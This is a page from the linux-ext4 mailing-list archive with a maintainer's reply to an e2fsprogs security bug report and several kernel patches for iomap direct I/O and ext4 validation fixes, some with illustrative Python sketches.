* Re: security bug reporting: e2fsprogs: Path Traversal and heap overflow
From: Andreas Dilger @ 2026-06-08 9:49 UTC (permalink / raw)
To: Feng Xue; +Cc: tytso@mit.edu, linux-ext4@vger.kernel.org
In-Reply-To: <SY0P300MB0070F750CCF6F2C3A2A91FDE901F2@SY0P300MB0070.AUSP300.PROD.OUTLOOK.COM>
[-- Attachment #1: Type: text/plain, Size: 949 bytes --]
Hello Feng Xue,
Thank you for your report. The inode blocks overflow looks legitimate and is trivial to fix. The reproducer is a bit unusual: it is a Python script that generates a synthetic ext4 image directly, rather than an e2fsck test case like "f_64kblock" that uses mke2fs to create the filesystem with mostly appropriate parameters and debugfs to overwrite the values.
Then e2fsck can be run on the filesystem to fix the superblock s_blocks_per_group value.
A patch is attached with the trivial code fix for review and includes a test case.
The debugfs issue seems less important, since it requires the administrator to run a specific debugfs command on a specific file.
> On Jun 7, 2026, at 07:34, Feng Xue <feng.xue@outlook.com> wrote:
>
> Hi there,
>
> I'd like to report two potential security bugs for your review.
> detailed report and pocs attached.
>
> Best,
> Feng
Cheers, Andreas
[-- Attachment #2: 0001-libext2fs-fix-inode_blocks-overflow-in-ext2fs_open.patch --]
[-- Type: application/octet-stream, Size: 6294 bytes --]
* [PATCH v4] iomap: add simple read path for small direct I/O
From: Fengnan Chang @ 2026-06-08 7:31 UTC (permalink / raw)
To: brauner, djwong, hch, ojaswin, dgc, linux-xfs, linux-fsdevel,
linux-ext4, linux-kernel, lidiangang
Cc: Fengnan Chang
When running 4K random read workloads on high-performance Gen5 NVMe
SSDs, the software overhead in the iomap direct I/O path
(__iomap_dio_rw) becomes a significant bottleneck.
Using io_uring with poll mode for a 4K randread test on a raw block
device:
taskset -c 30 ./t/io_uring -p1 -d512 -b4096 -s32 -c32 -F1 -B1 -R1 -X1
-n1 -P1 /dev/nvme10n1
Result: ~3.2M IOPS
Running the exact same workload on ext4 and XFS:
taskset -c 30 ./t/io_uring -p1 -d512 -b4096 -s32 -c32 -F1 -B1 -R1 -X1
-n1 -P1 /mnt/testfile
Result: ~1.92M IOPS
Profiling the ext4 workload reveals that a significant portion of CPU
time is spent on memory allocation and the iomap state machine
iteration:
5.33% [kernel] [k] __iomap_dio_rw
3.26% [kernel] [k] iomap_iter
2.37% [kernel] [k] iomap_dio_bio_iter
2.35% [kernel] [k] kfree
1.33% [kernel] [k] iomap_dio_complete
Introduce a simple read path to reduce the iomap overhead. The simple read
path is triggered when the request satisfies:
- I/O size is <= inode blocksize (fits in a single block, no splits).
- No custom `iomap_dio_ops` (dops) registered by the filesystem.
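The eligibility conditions can be sketched as a plain predicate. This is an illustrative Python model, not kernel code: the `Request` class and its field names are hypothetical stand-ins, and the additional checks (read-only, non-zero length, not crossing EOF, no `done_before`, no FORCE_WAIT/PARTIAL flags) are taken from iomap_dio_simple_read_supported() and iomap_dio_rw() in this patch.

```python
from dataclasses import dataclass


@dataclass
class Request:
    """Hypothetical stand-in for the (iocb, iter, dops, dio_flags) inputs."""
    is_read: bool
    pos: int          # file offset, like iocb->ki_pos
    count: int        # bytes requested, like iov_iter_count(iter)
    blocksize: int    # like inode->i_sb->s_blocksize
    i_size: int       # like i_size_read(inode)
    has_dops: bool = False               # filesystem passed iomap_dio_ops
    done_before: int = 0                 # bytes already completed by caller
    force_wait_or_partial: bool = False  # IOMAP_DIO_FORCE_WAIT / _PARTIAL


def simple_read_eligible(req: Request) -> bool:
    """Return True when the request may try the simple read path."""
    if req.has_dops or req.done_before:
        return False
    if not req.is_read or req.count == 0:
        return False
    # Larger I/O may need splitting, so it stays on the generic path.
    if req.count > req.blocksize:
        return False
    if req.force_wait_or_partial:
        return False
    # Reads that would cross EOF are left to the generic path.
    return req.pos + req.count <= req.i_size
```

Passing this predicate only means the fast path is attempted. In the patch, the simple read can still return -ENOTBLK (for example when the mapping is not IOMAP_MAPPED), and the caller then falls back to __iomap_dio_rw().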
After this optimization, the heavy generic functions disappear from the
profile, replaced by a single streamlined execution path:
4.83% [kernel] [k] iomap_dio_simple_read
With this patch, 4K random read IOPS on ext4 increases from 1.92M to
2.19M in the original single-core io_uring poll-mode workload.
Below are the test results using fio:
fs    workload        qd   simple=0   simple=1     gain
ext4  libaio           1     18,768     18,796   +0.15%
ext4  libaio          64    462,459    479,435   +3.67%
ext4  libaio         128    462,427    478,411   +3.46%
ext4  libaio         256    461,579    477,561   +3.46%
ext4  io_uring         1     18,898     18,914   +0.08%
ext4  io_uring        64    564,405    590,145   +4.56%
ext4  io_uring       128    563,322    592,365   +5.16%
ext4  io_uring       256    562,281    590,593   +5.04%
ext4  io_uring_poll    1     19,292     19,271   -0.11%
ext4  io_uring_poll   64    994,612  1,006,334   +1.18%
ext4  io_uring_poll  128  1,421,945  1,518,535   +6.79%
ext4  io_uring_poll  256  1,576,507  1,772,901  +12.46%
xfs   libaio           1     18,778     18,781   +0.01%
xfs   libaio          64    459,617    476,411   +3.65%
xfs   libaio         128    461,642    477,571   +3.45%
xfs   libaio         256    459,828    475,224   +3.35%
xfs   io_uring         1     18,898     18,923   +0.13%
xfs   io_uring        64    557,195    583,320   +4.69%
xfs   io_uring       128    560,109    585,549   +4.54%
xfs   io_uring       256    559,117    581,846   +4.07%
xfs   io_uring_poll    1     19,257     19,301   +0.23%
xfs   io_uring_poll   64    983,827    998,497   +1.49%
xfs   io_uring_poll  128  1,389,644  1,489,604   +7.19%
xfs   io_uring_poll  256  1,523,554  1,702,827  +11.77%
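For readers who want to re-check the gain column, the relative change can be recomputed from the two IOPS columns. The helper below is a small sketch; the function name is made up for illustration and the sample rows are copied from the table above.

```python
def gain_percent(before: int, after: int) -> float:
    """Relative IOPS change in percent, as reported in the gain column."""
    return (after - before) / before * 100.0


# (fs, workload, qd, simple=0 IOPS, simple=1 IOPS), copied from the table.
rows = [
    ("ext4", "libaio", 64, 462_459, 479_435),
    ("ext4", "io_uring_poll", 256, 1_576_507, 1_772_901),
    ("xfs", "io_uring_poll", 256, 1_523_554, 1_702_827),
]

for fs, workload, qd, before, after in rows:
    print(f"{fs:<4} {workload:<13} qd={qd:<3} {gain_percent(before, after):+.2f}%")
```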
v4:
fix fserror report and update test data based on v7.1-rc3.
v3:
Test data updated based on v7.1-rc3.
Signed-off-by: Fengnan Chang <changfengnan@bytedance.com>
---
fs/iomap/direct-io.c | 390 +++++++++++++++++++++++++++++++++++++++++--
1 file changed, 376 insertions(+), 14 deletions(-)
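Reviewer aid (not part of the patch): the three-state rendezvous between the submitter and end_io, described in the comment above the IOMAP_DIO_SIMPLE_* enum in the diff, can be modelled in a few lines. This is a hedged Python sketch. `AtomicState` is a hypothetical stand-in for atomic_t with atomic_cmpxchg() semantics, and the model leaves out the atomic_read() shortcut that the patch takes before the cmpxchg.

```python
import threading

SUBMITTING, QUEUED, DONE = 0, 1, 2


class AtomicState:
    """Hypothetical stand-in for atomic_t; a lock emulates atomicity."""

    def __init__(self, value: int) -> None:
        self._value = value
        self._lock = threading.Lock()

    def cmpxchg(self, old: int, new: int) -> int:
        """Store new if the current value equals old; return the old value."""
        with self._lock:
            prev = self._value
            if prev == old:
                self._value = new
            return prev


def end_io_must_complete(state: AtomicState) -> bool:
    """Completion side: True if end_io has to call ki_complete() itself."""
    return state.cmpxchg(SUBMITTING, DONE) == QUEUED


def submitter_must_complete(state: AtomicState) -> bool:
    """Submit side: True if the bio already finished, so the submitter
    completes synchronously instead of returning -EIOCBQUEUED."""
    return state.cmpxchg(SUBMITTING, QUEUED) == DONE
```

Whichever side performs its cmpxchg second sees the other side's state and takes over the completion, so in this model exactly one of the two functions returns True for any ordering.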
diff --git a/fs/iomap/direct-io.c b/fs/iomap/direct-io.c
index b36ee619cdcdd..3cb179752612e 100644
--- a/fs/iomap/direct-io.c
+++ b/fs/iomap/direct-io.c
@@ -10,6 +10,9 @@
#include <linux/iomap.h>
#include <linux/task_io_accounting_ops.h>
#include <linux/fserror.h>
+#include <linux/kobject.h>
+#include <linux/sysfs.h>
+#include <linux/init.h>
#include "internal.h"
#include "trace.h"
@@ -88,9 +91,9 @@ static inline enum fserror_type iomap_dio_err_type(const struct iomap_dio *dio)
return FSERR_DIRECTIO_READ;
}
-static inline bool should_report_dio_fserror(const struct iomap_dio *dio)
+static inline bool should_report_dio_fserror(int error)
{
- switch (dio->error) {
+ switch (error) {
case 0:
case -EAGAIN:
case -ENOTBLK:
@@ -110,7 +113,7 @@ ssize_t iomap_dio_complete(struct iomap_dio *dio)
if (dops && dops->end_io)
ret = dops->end_io(iocb, dio->size, ret, dio->flags);
- if (should_report_dio_fserror(dio))
+ if (should_report_dio_fserror(dio->error))
fserror_report_io(file_inode(iocb->ki_filp),
iomap_dio_err_type(dio), offset, dio->size,
dio->error, GFP_NOFS);
@@ -237,23 +240,29 @@ static void iomap_dio_done(struct iomap_dio *dio)
iomap_dio_complete_work(&dio->aio.work);
}
-static void __iomap_dio_bio_end_io(struct bio *bio, bool inline_completion)
+static inline void iomap_dio_bio_release_pages(struct bio *bio,
+ unsigned int dio_flags, bool error)
{
- struct iomap_dio *dio = bio->bi_private;
-
if (bio_integrity(bio))
fs_bio_integrity_free(bio);
- if (dio->flags & IOMAP_DIO_BOUNCE) {
- bio_iov_iter_unbounce(bio, !!dio->error,
- dio->flags & IOMAP_DIO_USER_BACKED);
+ if (dio_flags & IOMAP_DIO_BOUNCE) {
+ bio_iov_iter_unbounce(bio, error,
+ dio_flags & IOMAP_DIO_USER_BACKED);
bio_put(bio);
- } else if (dio->flags & IOMAP_DIO_USER_BACKED) {
+ } else if (dio_flags & IOMAP_DIO_USER_BACKED) {
bio_check_pages_dirty(bio);
} else {
bio_release_pages(bio, false);
bio_put(bio);
}
+}
+
+static void __iomap_dio_bio_end_io(struct bio *bio, bool inline_completion)
+{
+ struct iomap_dio *dio = bio->bi_private;
+
+ iomap_dio_bio_release_pages(bio, dio->flags, !!dio->error);
/* Do not touch bio below, we just gave up our reference. */
@@ -398,6 +407,14 @@ static ssize_t iomap_dio_bio_iter_one(struct iomap_iter *iter,
return ret;
}
+static inline unsigned int iomap_dio_alignment(struct inode *inode,
+ struct block_device *bdev, unsigned int dio_flags)
+{
+ if (dio_flags & IOMAP_DIO_FSBLOCK_ALIGNED)
+ return i_blocksize(inode);
+ return bdev_logical_block_size(bdev);
+}
+
static int iomap_dio_bio_iter(struct iomap_iter *iter, struct iomap_dio *dio)
{
const struct iomap *iomap = &iter->iomap;
@@ -416,10 +433,7 @@ static int iomap_dio_bio_iter(struct iomap_iter *iter, struct iomap_dio *dio)
* File systems that write out of place and always allocate new blocks
* need each bio to be block aligned as that's the unit of allocation.
*/
- if (dio->flags & IOMAP_DIO_FSBLOCK_ALIGNED)
- alignment = fs_block_size;
- else
- alignment = bdev_logical_block_size(iomap->bdev);
+ alignment = iomap_dio_alignment(inode, iomap->bdev, dio->flags);
if ((pos | length) & (alignment - 1))
return -EINVAL;
@@ -891,12 +905,352 @@ __iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
}
EXPORT_SYMBOL_GPL(__iomap_dio_rw);
+struct iomap_dio_simple_read {
+ struct kiocb *iocb;
+ size_t size;
+ unsigned int dio_flags;
+ atomic_t state;
+ union {
+ struct task_struct *waiter;
+ struct work_struct work;
+ };
+ /*
+ * Align @bio to a cacheline boundary so that, combined with the
+ * front_pad passed to bioset_init(), the bio sits at the start of
+ * a cacheline in memory returned by the (HWCACHE-aligned) bio
+ * slab. This keeps the hot fields block layer touches on submit
+ * and completion (bi_iter, bi_status, ...) within a single line.
+ */
+ struct bio bio ____cacheline_aligned_in_smp;
+};
+
+static struct bio_set iomap_dio_simple_read_pool;
+
+/*
+ * In the async simple read path, we need to prevent bio_endio() from
+ * triggering iocb->ki_complete() before the submitter has returned
+ * -EIOCBQUEUED. Otherwise, the caller might free the iocb concurrently.
+ *
+ * We use a three-state rendezvous to synchronize the submitter and end_io:
+ *
+ * IOMAP_DIO_SIMPLE_SUBMITTING: Initial state set before submitting the bio.
+ *
+ * IOMAP_DIO_SIMPLE_QUEUED: The submitter has safely queued the IO and will
+ * return -EIOCBQUEUED. If end_io sees this state, it takes over and calls
+ * ki_complete().
+ *
+ * IOMAP_DIO_SIMPLE_DONE: end_io fired before the submitter finished the
+ * submit path. end_io sets this state and does nothing else. The submitter
+ * will see this state and handle the completion synchronously (bypassing
+ * ki_complete() and returning the actual result).
+ */
+enum {
+ IOMAP_DIO_SIMPLE_SUBMITTING = 0,
+ IOMAP_DIO_SIMPLE_QUEUED,
+ IOMAP_DIO_SIMPLE_DONE,
+};
+
+static ssize_t iomap_dio_simple_read_finish(struct kiocb *iocb,
+ struct bio *bio, ssize_t ret)
+{
+ struct inode *inode = file_inode(iocb->ki_filp);
+ struct iomap_dio_simple_read *sr = bio->bi_private;
+
+ if (likely(!ret)) {
+ ret = sr->size;
+ iocb->ki_pos += ret;
+ } else if (should_report_dio_fserror(ret)) {
+ fserror_report_io(inode, FSERR_DIRECTIO_READ, iocb->ki_pos,
+ sr->size, ret, GFP_NOFS);
+ }
+
+ iomap_dio_bio_release_pages(bio, sr->dio_flags, ret < 0);
+
+ return ret;
+}
+
+static ssize_t iomap_dio_simple_read_complete(struct kiocb *iocb,
+ struct bio *bio)
+{
+ struct inode *inode = file_inode(iocb->ki_filp);
+ ssize_t ret;
+
+ WRITE_ONCE(iocb->private, NULL);
+
+ ret = iomap_dio_simple_read_finish(iocb, bio,
+ blk_status_to_errno(bio->bi_status));
+
+ inode_dio_end(inode);
+ trace_iomap_dio_complete(iocb, ret < 0 ? ret : 0, ret > 0 ? ret : 0);
+ return ret;
+}
+
+static void iomap_dio_simple_read_complete_work(struct work_struct *work)
+{
+ struct iomap_dio_simple_read *sr =
+ container_of(work, struct iomap_dio_simple_read, work);
+ struct kiocb *iocb = sr->iocb;
+ ssize_t ret;
+
+ ret = iomap_dio_simple_read_complete(iocb, &sr->bio);
+ iocb->ki_complete(iocb, ret);
+}
+
+static void iomap_dio_simple_read_async_done(struct iomap_dio_simple_read *sr)
+{
+ struct kiocb *iocb = sr->iocb;
+
+ if (unlikely(sr->bio.bi_status)) {
+ struct inode *inode = file_inode(iocb->ki_filp);
+
+ INIT_WORK(&sr->work, iomap_dio_simple_read_complete_work);
+ queue_work(inode->i_sb->s_dio_done_wq, &sr->work);
+ return;
+ }
+
+ iomap_dio_simple_read_complete_work(&sr->work);
+}
+
+static void iomap_dio_simple_read_end_io(struct bio *bio)
+{
+ struct iomap_dio_simple_read *sr = bio->bi_private;
+
+ if (sr->waiter) {
+ struct task_struct *waiter = sr->waiter;
+
+ WRITE_ONCE(sr->waiter, NULL);
+ blk_wake_io_task(waiter);
+ return;
+ }
+
+ if (likely(atomic_read(&sr->state) == IOMAP_DIO_SIMPLE_QUEUED) ||
+ atomic_cmpxchg(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING,
+ IOMAP_DIO_SIMPLE_DONE) == IOMAP_DIO_SIMPLE_QUEUED)
+ iomap_dio_simple_read_async_done(sr);
+}
+
+static inline bool iomap_dio_simple_read_supported(struct kiocb *iocb,
+ struct iov_iter *iter, unsigned int dio_flags)
+{
+ struct inode *inode = file_inode(iocb->ki_filp);
+ size_t count = iov_iter_count(iter);
+
+ if (iov_iter_rw(iter) != READ)
+ return false;
+ if (!count)
+ return false;
+ /*
+ * Simple read is an optimization for small IO. Filter out large IO
+ * early as it's the most common case to fail for typical direct IO
+ * workloads.
+ */
+ if (count > inode->i_sb->s_blocksize)
+ return false;
+ if (dio_flags & (IOMAP_DIO_FORCE_WAIT | IOMAP_DIO_PARTIAL))
+ return false;
+ if (iocb->ki_pos + count > i_size_read(inode))
+ return false;
+
+ return true;
+}
+
+static ssize_t iomap_dio_simple_read(struct kiocb *iocb,
+ struct iov_iter *iter, const struct iomap_ops *ops,
+ void *private, unsigned int dio_flags)
+{
+ struct inode *inode = file_inode(iocb->ki_filp);
+ size_t count = iov_iter_count(iter);
+ int nr_pages;
+ struct iomap_dio_simple_read *sr;
+ unsigned int alignment;
+ struct iomap_iter iomi = {
+ .inode = inode,
+ .pos = iocb->ki_pos,
+ .len = count,
+ .flags = IOMAP_DIRECT,
+ .private = private,
+ };
+ struct bio *bio;
+ bool wait_for_completion = is_sync_kiocb(iocb);
+ ssize_t ret;
+
+ if (dio_flags & IOMAP_DIO_BOUNCE)
+ nr_pages = bio_iov_bounce_nr_vecs(iter, REQ_OP_READ);
+ else
+ nr_pages = bio_iov_vecs_to_alloc(iter, BIO_MAX_VECS);
+
+ if (iocb->ki_flags & IOCB_NOWAIT)
+ iomi.flags |= IOMAP_NOWAIT;
+
+ ret = kiocb_write_and_wait(iocb, count);
+ if (ret)
+ return ret;
+
+ inode_dio_begin(inode);
+
+ ret = ops->iomap_begin(inode, iomi.pos, count, iomi.flags,
+ &iomi.iomap, &iomi.srcmap);
+ if (ret) {
+ inode_dio_end(inode);
+ return ret;
+ }
+
+ if (iomi.iomap.type != IOMAP_MAPPED ||
+ iomi.iomap.offset > iomi.pos ||
+ iomi.iomap.offset + iomi.iomap.length < iomi.pos + count ||
+ (iomi.iomap.flags & IOMAP_F_INTEGRITY)) {
+ ret = -ENOTBLK;
+ goto out_iomap_end;
+ }
+
+ alignment = iomap_dio_alignment(inode, iomi.iomap.bdev, dio_flags);
+ if ((iomi.pos | count) & (alignment - 1)) {
+ ret = -EINVAL;
+ goto out_iomap_end;
+ }
+
+ if (!wait_for_completion && unlikely(!inode->i_sb->s_dio_done_wq)) {
+ ret = sb_init_dio_done_wq(inode->i_sb);
+ if (ret < 0)
+ goto out_iomap_end;
+ }
+
+ trace_iomap_dio_rw_begin(iocb, iter, dio_flags, 0);
+
+ if (user_backed_iter(iter))
+ dio_flags |= IOMAP_DIO_USER_BACKED;
+
+ bio = bio_alloc_bioset(iomi.iomap.bdev, nr_pages,
+ REQ_OP_READ | REQ_SYNC | REQ_IDLE,
+ GFP_KERNEL, &iomap_dio_simple_read_pool);
+ sr = container_of(bio, struct iomap_dio_simple_read, bio);
+
+ fscrypt_set_bio_crypt_ctx(bio, inode, iomi.pos, GFP_KERNEL);
+ sr->iocb = iocb;
+ sr->dio_flags = dio_flags;
+
+ bio->bi_iter.bi_sector = iomap_sector(&iomi.iomap, iomi.pos);
+ bio->bi_ioprio = iocb->ki_ioprio;
+ bio->bi_private = sr;
+ bio->bi_end_io = iomap_dio_simple_read_end_io;
+
+ if (dio_flags & IOMAP_DIO_BOUNCE)
+ ret = bio_iov_iter_bounce(bio, iter, count);
+ else
+ ret = bio_iov_iter_get_pages(bio, iter, alignment - 1);
+ if (unlikely(ret))
+ goto out_bio_put;
+
+ if (bio->bi_iter.bi_size != count) {
+ iov_iter_revert(iter, bio->bi_iter.bi_size);
+ ret = -ENOTBLK;
+ goto out_bio_release_pages;
+ }
+
+ sr->size = bio->bi_iter.bi_size;
+
+ if ((dio_flags & IOMAP_DIO_USER_BACKED) &&
+ !(dio_flags & IOMAP_DIO_BOUNCE))
+ bio_set_pages_dirty(bio);
+
+ if (iocb->ki_flags & IOCB_NOWAIT)
+ bio->bi_opf |= REQ_NOWAIT;
+ if ((iocb->ki_flags & IOCB_HIPRI) && !wait_for_completion) {
+ bio->bi_opf |= REQ_POLLED;
+ bio_set_polled(bio, iocb);
+ WRITE_ONCE(iocb->private, bio);
+ }
+
+ if (wait_for_completion) {
+ sr->waiter = current;
+ blk_crypto_submit_bio(bio);
+ } else {
+ atomic_set(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING);
+ sr->waiter = NULL;
+ blk_crypto_submit_bio(bio);
+ ret = -EIOCBQUEUED;
+ }
+
+ if (ops->iomap_end)
+ ops->iomap_end(inode, iomi.pos, count, count, iomi.flags,
+ &iomi.iomap);
+
+ if (wait_for_completion) {
+ for (;;) {
+ set_current_state(TASK_UNINTERRUPTIBLE);
+ if (!READ_ONCE(sr->waiter))
+ break;
+ blk_io_schedule();
+ }
+ __set_current_state(TASK_RUNNING);
+
+ ret = iomap_dio_simple_read_finish(iocb, bio,
+ blk_status_to_errno(bio->bi_status));
+ inode_dio_end(inode);
+ trace_iomap_dio_complete(iocb, ret < 0 ? ret : 0,
+ ret > 0 ? ret : 0);
+ } else if (atomic_cmpxchg(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING,
+ IOMAP_DIO_SIMPLE_QUEUED) ==
+ IOMAP_DIO_SIMPLE_DONE) {
+ ret = iomap_dio_simple_read_complete(iocb, bio);
+ } else {
+ trace_iomap_dio_rw_queued(inode, iomi.pos, count);
+ }
+
+ return ret;
+
+out_bio_release_pages:
+ if (dio_flags & IOMAP_DIO_BOUNCE)
+ bio_iov_iter_unbounce(bio, true, false);
+ else
+ bio_release_pages(bio, false);
+out_bio_put:
+ bio_put(bio);
+out_iomap_end:
+ if (ops->iomap_end)
+ ops->iomap_end(inode, iomi.pos, count, 0, iomi.flags,
+ &iomi.iomap);
+ inode_dio_end(inode);
+ return ret;
+}
+
ssize_t
iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
const struct iomap_ops *ops, const struct iomap_dio_ops *dops,
unsigned int dio_flags, void *private, size_t done_before)
{
struct iomap_dio *dio;
+ ssize_t ret;
+
+ /*
+ * Fast path for small, block-aligned reads that map to a single
+ * contiguous on-disk extent.
+ *
+ * @dops must be NULL: a non-NULL @dops means the caller wants its
+ * ->end_io / ->submit_io hooks invoked, and in particular wants its
+ * bios to be allocated from the filesystem-private @dops->bio_set
+ * (whose front_pad sizes a filesystem-private wrapper around the
+ * bio). The fast path instead allocates from the shared
+ * iomap_dio_simple_read_pool, whose front_pad matches
+ * struct iomap_dio_simple_read; the two wrappers are not
+ * interchangeable, so we must fall back to __iomap_dio_rw() in
+ * that case.
+ *
+ * @done_before must be zero: a non-zero caller-accumulated residual
+ * cannot be carried through a single-bio inline completion.
+ *
+ * -ENOTBLK is the private sentinel returned by iomap_dio_simple_read()
+ * when it decides the request does not fit the fast path.
+ * In that case we proceed to the generic __iomap_dio_rw() slow
+ * path. Any other errno is a real result and is propagated as-is,
+ * in particular -EAGAIN for IOCB_NOWAIT must reach the caller.
+ */
+ if (!dops && !done_before &&
+ iomap_dio_simple_read_supported(iocb, iter, dio_flags)) {
+ ret = iomap_dio_simple_read(iocb, iter, ops, private, dio_flags);
+ if (ret != -ENOTBLK)
+ return ret;
+ }
dio = __iomap_dio_rw(iocb, iter, ops, dops, dio_flags, private,
done_before);
@@ -905,3 +1259,11 @@ iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
return iomap_dio_complete(dio);
}
EXPORT_SYMBOL_GPL(iomap_dio_rw);
+
+static int __init iomap_dio_init(void)
+{
+ return bioset_init(&iomap_dio_simple_read_pool, 4,
+ offsetof(struct iomap_dio_simple_read, bio),
+ BIOSET_NEED_BVECS | BIOSET_PERCPU_CACHE);
+}
+fs_initcall(iomap_dio_init);
--
2.39.5 (Apple Git-154)
* [PATCH] ext4: fix kernel BUG in ext4_write_inline_data_end
From: Aditya Prakash Srivastava @ 2026-06-08 6:52 UTC (permalink / raw)
To: Theodore Ts'o, Andreas Dilger
Cc: Jan Kara, Baokun Li, Ojaswin Mujoo, Ritesh Harjani, Zhang Yi,
linux-ext4, linux-kernel, Aditya Prakash Srivastava,
syzbot+0c89d865531d053abb2d
When the data=journal mount option is used, the ext4_journalled_write_end()
function incorrectly calls ext4_write_inline_data_end() without checking
if the EXT4_STATE_MAY_INLINE_DATA flag is still set on the inode.
If a previous attempt to convert the inline data to an extent failed (e.g.
due to ENOSPC), the EXT4_STATE_MAY_INLINE_DATA flag is cleared, but
the EXT4_INODE_INLINE_DATA flag remains set. In this scenario, the next
call to ext4_write_begin() will not prepare the inline data xattr for
writing, but ext4_journalled_write_end() will incorrectly attempt to write
to it, triggering a BUG_ON(pos + len > EXT4_I(inode)->i_inline_size) in
ext4_write_inline_data() since i_inline_size was not expanded.
Fix this by ensuring that ext4_journalled_write_end() only calls
ext4_write_inline_data_end() if the EXT4_STATE_MAY_INLINE_DATA flag is
set, mirroring the behavior of ext4_write_end() and ext4_da_write_end().
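The decision being changed can be modelled as a two-flag check. This is only an illustrative Python sketch: the function and parameter names are hypothetical, `has_inline_data` stands for ext4_has_inline_data(inode), and `may_inline_data` stands for the EXT4_STATE_MAY_INLINE_DATA state bit.

```python
def journalled_write_end_path(has_inline_data: bool,
                              may_inline_data: bool,
                              *, fixed: bool = True) -> str:
    """Return which write_end path would be taken in this simplified model.

    With fixed=False only the on-disk inline flag is consulted, which is
    the pre-patch behaviour described above.
    """
    if has_inline_data and (may_inline_data or not fixed):
        return "inline"   # ext4_write_inline_data_end()
    return "regular"      # normal journalled write_end handling


# State after a failed inline-to-extent conversion: the inode flag is still
# set, but the MAY_INLINE_DATA state bit has been cleared.
print(journalled_write_end_path(True, False, fixed=False))
print(journalled_write_end_path(True, False, fixed=True))
```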
Reported-by: syzbot+0c89d865531d053abb2d@syzkaller.appspotmail.com
Closes: https://syzkaller.appspot.com/bug?extid=0c89d865531d053abb2d
Fixes: 3fdcfb668fd7 ("ext4: add journalled write support for inline data")
Signed-off-by: Aditya Prakash Srivastava <aditya.ansh182@gmail.com>
---
fs/ext4/inode.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index c2c2d6ac7f3d..4fce9ec176f8 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -1560,7 +1560,8 @@ static int ext4_journalled_write_end(const struct kiocb *iocb,
BUG_ON(!ext4_handle_valid(handle));
- if (ext4_has_inline_data(inode))
+ if (ext4_has_inline_data(inode) &&
+ ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA))
return ext4_write_inline_data_end(inode, pos, len, copied,
folio);
--
2.47.3
* [PATCH] ext4: reject mount if clusters/inodes per group are not 8-aligned
From: Baokun Li @ 2026-06-08 6:11 UTC (permalink / raw)
To: linux-ext4
Cc: tytso, adilger.kernel, jack, yi.zhang, ojaswin, ritesh.list,
Sashiko
The block and inode bitmap checksums are computed over a whole number of
bytes: ext4_inode_bitmap_csum_*() use EXT4_INODES_PER_GROUP(sb) >> 3 and
ext4_block_bitmap_csum_*() use EXT4_CLUSTERS_PER_GROUP(sb) / 8 as the
length passed to ext4_chksum().
If s_inodes_per_group or s_clusters_per_group is not a multiple of 8, the
trailing fractional bits are excluded from the checksum. Those bits are
then unprotected, and any incremental csum update path that assumes a
byte-aligned bitmap can compute a checksum inconsistent with the full
recalculation, corrupting the on-disk bitmap checksum.
Reject such filesystems at mount time by adding the missing " & 7"
alignment checks alongside the existing range validation.
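The arithmetic behind this can be sketched in Python. The helper names below are hypothetical and the model covers only the upper-bound and alignment parts of the checks (the inode check in the diff also has a lower bound that is not modelled here).

```python
def csum_covered_bits(per_group: int) -> int:
    """Bits covered when the checksum length is per_group >> 3 bytes."""
    return (per_group >> 3) * 8


def uncovered_bits(per_group: int) -> int:
    """Trailing bitmap bits that fall outside the checksummed bytes."""
    return per_group - csum_covered_bits(per_group)


def per_group_valid(per_group: int, blocksize: int) -> bool:
    """Existing range check plus the added '& 7' alignment check."""
    return per_group <= blocksize * 8 and (per_group & 7) == 0


for value in (8192, 8193, 8199):
    print(value, uncovered_bits(value), per_group_valid(value, 4096))
```

Any value with a non-zero `value & 7` leaves between one and seven bits outside the checksummed range, which is exactly the case the mount-time check now rejects.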
Suggested-by: Theodore Ts'o <tytso@mit.edu>
Link: https://patch.msgid.link/h3n7jlfhyna64dn5o76qxcspnhxdddcs6crpxftmy7gnl7b3sx@jenszfpcsnit
Reported-by: Sashiko <sashiko-bot@kernel.org>
Closes: https://sashiko.dev/#/patchset/20260508121539.4174601-1-libaokun%40linux.alibaba.com?part=10
Signed-off-by: Baokun Li <libaokun@linux.alibaba.com>
---
fs/ext4/super.c | 8 +++++---
1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index 6a77db4d3124..3daf4cdcf07e 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -4472,8 +4472,9 @@ static int ext4_handle_clustersize(struct super_block *sb)
sbi->s_cluster_bits = 0;
}
sbi->s_clusters_per_group = le32_to_cpu(es->s_clusters_per_group);
- if (sbi->s_clusters_per_group > sb->s_blocksize * 8) {
- ext4_msg(sb, KERN_ERR, "#clusters per group too big: %lu",
+ if (sbi->s_clusters_per_group > sb->s_blocksize * 8 ||
+ sbi->s_clusters_per_group & 7) {
+ ext4_msg(sb, KERN_ERR, "invalid #clusters per group: %lu",
sbi->s_clusters_per_group);
return -EINVAL;
}
@@ -5304,7 +5305,8 @@ static int ext4_block_group_meta_init(struct super_block *sb, int silent)
return -EINVAL;
}
if (sbi->s_inodes_per_group < sbi->s_inodes_per_block ||
- sbi->s_inodes_per_group > sb->s_blocksize * 8) {
+ sbi->s_inodes_per_group > sb->s_blocksize * 8 ||
+ sbi->s_inodes_per_group & 7) {
ext4_msg(sb, KERN_ERR, "invalid inodes per group: %lu\n",
sbi->s_inodes_per_group);
return -EINVAL;
--
2.43.7
* Re: [RFC PATCH] ext4: fix false-negative overwrite check for DIO spanning extent boundaries
From: Baokun Li @ 2026-06-08 2:25 UTC (permalink / raw)
To: Peng Wang
Cc: tytso, adilger.kernel, jack, ojaswin, ritesh.list, yi.zhang,
linux-ext4, linux-kernel
In-Reply-To: <20260607124935.6168-1-peng_wang@linux.alibaba.com>
On 2026/6/7 20:49, Peng Wang wrote:
> ext4_overwrite_io() decides whether a direct I/O write is an overwrite
> (all target blocks already allocated) so the write can proceed under a
> shared inode lock. It calls ext4_map_blocks() once and returns false
> if the mapped length is shorter than the requested length.
>
> ext4_map_blocks() maps at most one extent per call. When a write
